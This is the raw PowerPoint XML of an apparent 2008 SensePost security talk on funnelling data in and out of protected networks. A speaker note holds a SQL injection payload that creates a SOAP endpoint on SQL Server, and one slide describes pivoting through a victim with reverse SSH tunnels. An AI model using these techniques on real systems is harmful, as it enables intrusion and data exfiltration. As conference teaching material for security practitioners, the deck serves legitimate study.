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slides/slide1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2"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="336" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="260" r:id="rId5"/>
    <p:sldId id="262" r:id="rId6"/>
    <p:sldId id="268" r:id="rId7"/>
    <p:sldId id="261" r:id="rId8"/>
    <p:sldId id="263" r:id="rId9"/>
    <p:sldId id="354" r:id="rId10"/>
    <p:sldId id="279" r:id="rId11"/>
    <p:sldId id="264" r:id="rId12"/>
    <p:sldId id="355" r:id="rId13"/>
    <p:sldId id="299" r:id="rId14"/>
    <p:sldId id="300" r:id="rId15"/>
    <p:sldId id="301" r:id="rId16"/>
    <p:sldId id="267" r:id="rId17"/>
    <p:sldId id="269" r:id="rId18"/>
    <p:sldId id="352" r:id="rId19"/>
    <p:sldId id="339" r:id="rId20"/>
    <p:sldId id="340" r:id="rId21"/>
    <p:sldId id="341" r:id="rId22"/>
    <p:sldId id="342" r:id="rId23"/>
    <p:sldId id="343" r:id="rId24"/>
    <p:sldId id="344" r:id="rId25"/>
    <p:sldId id="280" r:id="rId26"/>
    <p:sldId id="270" r:id="rId27"/>
    <p:sldId id="302" r:id="rId28"/>
    <p:sldId id="303" r:id="rId29"/>
    <p:sldId id="356" r:id="rId30"/>
    <p:sldId id="305" r:id="rId31"/>
    <p:sldId id="306" r:id="rId32"/>
    <p:sldId id="357" r:id="rId33"/>
    <p:sldId id="307" r:id="rId34"/>
    <p:sldId id="358" r:id="rId35"/>
    <p:sldId id="359" r:id="rId36"/>
    <p:sldId id="360" r:id="rId37"/>
    <p:sldId id="361" r:id="rId38"/>
    <p:sldId id="362" r:id="rId39"/>
    <p:sldId id="363" r:id="rId40"/>
    <p:sldId id="364" r:id="rId41"/>
    <p:sldId id="365" r:id="rId42"/>
    <p:sldId id="366" r:id="rId43"/>
    <p:sldId id="367" r:id="rId44"/>
    <p:sldId id="368" r:id="rId45"/>
    <p:sldId id="273" r:id="rId46"/>
    <p:sldId id="282" r:id="rId47"/>
    <p:sldId id="283" r:id="rId48"/>
    <p:sldId id="284" r:id="rId49"/>
    <p:sldId id="285" r:id="rId50"/>
    <p:sldId id="286" r:id="rId51"/>
    <p:sldId id="287" r:id="rId52"/>
    <p:sldId id="288" r:id="rId53"/>
    <p:sldId id="289" r:id="rId54"/>
    <p:sldId id="290" r:id="rId55"/>
    <p:sldId id="274" r:id="rId56"/>
    <p:sldId id="296" r:id="rId57"/>
    <p:sldId id="297" r:id="rId58"/>
    <p:sldId id="275" r:id="rId59"/>
    <p:sldId id="322" r:id="rId60"/>
    <p:sldId id="323" r:id="rId61"/>
    <p:sldId id="353" r:id="rId62"/>
    <p:sldId id="324" r:id="rId63"/>
    <p:sldId id="325" r:id="rId64"/>
    <p:sldId id="326" r:id="rId65"/>
    <p:sldId id="327" r:id="rId66"/>
    <p:sldId id="347" r:id="rId67"/>
    <p:sldId id="329" r:id="rId68"/>
    <p:sldId id="348" r:id="rId69"/>
    <p:sldId id="349" r:id="rId70"/>
    <p:sldId id="350" r:id="rId71"/>
    <p:sldId id="330" r:id="rId72"/>
    <p:sldId id="331" r:id="rId73"/>
    <p:sldId id="351" r:id="rId74"/>
    <p:sldId id="332" r:id="rId75"/>
    <p:sldId id="369" r:id="rId76"/>
    <p:sldId id="370" r:id="rId77"/>
    <p:sldId id="371" r:id="rId78"/>
    <p:sldId id="372" r:id="rId79"/>
    <p:sldId id="333" r:id="rId80"/>
    <p:sldId id="321"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89898"/>
    <a:srgbClr val="A8BD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2302" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="-2848" y="-17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viewProps" Target="viewProps.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tableStyles" Target="tableStyle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notesMaster" Target="notesMasters/notesMaster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theme" Target="theme/theme1.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printerSettings" Target="printerSettings/printerSettings1.bin"/><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DD87E-ECB4-1446-98A4-D3014C21E63B}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/19/08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4193F-161E-5D45-BC57-64F8E9556B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4193F-161E-5D45-BC57-64F8E9556B8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Familiar because MSXML2.HTTPXML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5D6C2B81-32EA-6948-9C05-F9A5FA955736}"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exec('CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> ENDPOINT ep2 STATE=STARTED AS HTTP(AUTHENTICATION=(INTEGRATED),PATH = ''/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sp'',PORTS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=(CLEAR))FOR SOAP(BATCHES=ENABLED)')--</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C324193F-161E-5D45-BC57-64F8E9556B83}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>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6C05C-9F77-2845-8426-06100CF3F1A9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/19/08</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="54102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6C05C-9F77-2845-8426-06100CF3F1A9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/19/08</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="54102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6C05C-9F77-2845-8426-06100CF3F1A9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/19/08</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="54102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6C05C-9F77-2845-8426-06100CF3F1A9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/19/08</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="54102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6C05C-9F77-2845-8426-06100CF3F1A9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/19/08</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="54102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56C05C-9F77-2845-8426-06100CF3F1A9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/19/08</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="54102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56C05C-9F77-2845-8426-06100CF3F1A9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/19/08</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="541020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6C05C-9F77-2845-8426-06100CF3F1A9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/19/08</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="54102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6C05C-9F77-2845-8426-06100CF3F1A9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/19/08</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="541020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6C05C-9F77-2845-8426-06100CF3F1A9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/19/08</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="54102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6C05C-9F77-2845-8426-06100CF3F1A9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/19/08</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="54102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C57C0DB-5BBE-6044-BC2D-9A21EDF692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6C05C-9F77-2845-8426-06100CF3F1A9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/19/08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7C0DB-5BBE-6044-BC2D-9A21EDF692C8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="logo-clear2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8305800" y="6304515"/>
            <a:ext cx="838200" cy="553485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Picture 25" descr="Picture 1.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6172200"/>
            <a:ext cx="9144000" cy="165469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26" descr="Picture 1.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="838200"/>
            <a:ext cx="9144000" cy="165469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4040489" y="6428601"/>
            <a:ext cx="1369711" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="989898"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[SensePost – 2008]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="989898"/>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A8BDE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98989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98989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98989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98989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98989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2.png"/><Relationship Id="rId5"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hyperlink" Target="http://www.hsc.fr/ressources/outils/dns2tc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17.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4.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><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glenn@sensepost.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ian@sensepost.com" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:gert@sensepost.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55.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><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 Id="rId5"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3"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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.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0.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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hyperlink" Target="NULL" TargetMode="External"/><Relationship Id="rId3"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9.jpeg"/><Relationship Id="rId5"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975"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pushing a Camel through the eye of the Needle!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="2590800"/>
            <a:ext cx="6400800" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>[Funneling Data in and out of Protected Networks]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SensePost 2008</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="logo-clear2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3450429" y="3547994"/>
            <a:ext cx="2243142" cy="1481206"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:reflection stA="50000" endPos="75000" dist="127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6" name="Picture 25" descr="ear-right.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7989887" y="1972806"/>
            <a:ext cx="423862" cy="545722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 23" descr="ear-right.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1585965" y="1972806"/>
            <a:ext cx="423862" cy="545722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SSH Tunnels (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1066800"/>
            <a:ext cx="8229600" cy="5287962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Instead lets look at –R</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So all we need is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> client on the remote machine, an SSHD on one of ours and we are in the game!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>putty + plink FTW!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Picture 1.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="844982" y="1676400"/>
            <a:ext cx="7622400" cy="1300703"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="victim-icon.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="631031" y="1766669"/>
            <a:ext cx="1168400" cy="1168400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="images.jpeg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7033418" y="1972805"/>
            <a:ext cx="423862" cy="545722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="attacker-icon.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="1864578"/>
            <a:ext cx="1130300" cy="1003300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669131" y="2900144"/>
            <a:ext cx="1130300" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Local machine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3833018" y="2935069"/>
            <a:ext cx="1130300" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client is the Pivot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7033418" y="2867878"/>
            <a:ext cx="1130300" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Target</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="2303083"/>
